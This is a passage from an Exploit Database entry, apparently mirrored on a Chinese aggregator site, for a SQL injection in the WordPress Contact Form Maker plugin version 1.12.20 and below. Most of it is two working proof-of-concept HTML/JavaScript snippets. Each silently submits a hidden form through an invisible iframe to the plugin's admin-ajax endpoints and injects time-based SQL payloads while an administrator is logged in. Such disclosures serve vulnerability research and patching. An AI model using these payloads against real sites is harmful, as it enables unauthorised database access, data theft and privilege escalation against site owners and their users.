WordPress Plugin Contact Form Maker 1.12.20 – SQL Injection

• Exploit Database
• 22 阅读

• 作者： defensecode
  日期： 2018-06-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44854/

• # Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
  # Date: 2018-06-07
  # Author: Neven Biruski
  # Software: WordPress Contact Form Maker plugin
  # Software link: https://wordpress.org/plugins/contact-form-maker/
  # Version: 1.12.20 and below
  
  # The easiest way to reproduce the SQL injection vulnerabilities is to
  # open the presented HTML/JavaScript snippet in your browser while being
  # logged in as administrator or another user that is authorized to
  # access the plugin settings page. Users that do not have full
  # administrative privileges could abuse the database access the
  # vulnerabilities provide to either escalate their privileges or obtain
  # and modify database contents they were not supposed to be able to.
  
  
  # PoC 1
  
  <iframe style="display:none" name="invisible"></iframe>
  <form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct"
  target="invisible">
  <input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
  </form>
  <script>
   document.getElementById("form").submit();
   sleep(3000);
  </script>
  
  # PoC 2
  
  <iframe style="display:none" name="invisible"></iframe>
  <form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0"
  target="invisible">
  <input type="hidden" name="search_labels" value="(SELECT * FROM (SELECT(SLEEP(42)))XXX)"/>
  </form>
  <script>
   document.getElementById("form").submit();
   sleep(3000);
  </script>